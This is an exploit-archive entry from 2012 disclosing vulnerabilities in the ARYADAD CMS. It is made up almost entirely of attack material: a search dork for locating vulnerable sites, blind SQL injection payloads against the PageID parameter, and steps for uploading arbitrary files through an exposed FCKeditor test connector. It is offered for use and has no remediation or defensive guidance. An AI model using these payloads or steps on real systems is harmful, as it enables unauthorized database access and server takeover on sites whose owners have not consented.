ARYADAD - Multiple Vulnerabilities



EKU-ID: 24168 CVE: OSVDB-82332;OSVDB-78703;CVE-2012-0935 OSVDB-ID:
Author: Red Security TEAM Published: 2012-01-21 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


#
# Title     : ARYADAD Multi Vulnerability
# Author    : Red Security TEAM
# Date      : 21/01/2012
# Vendor    : http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork      : Powered by ARYADAD Corporation
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
#
# I         : Blind SQL Injection Vulnerability
# True      : http://server/Default.aspx?PageID=117' and 1-1 = '0
# False     : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II        : File Upload Vulnerability
# 1. Go to  : /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
#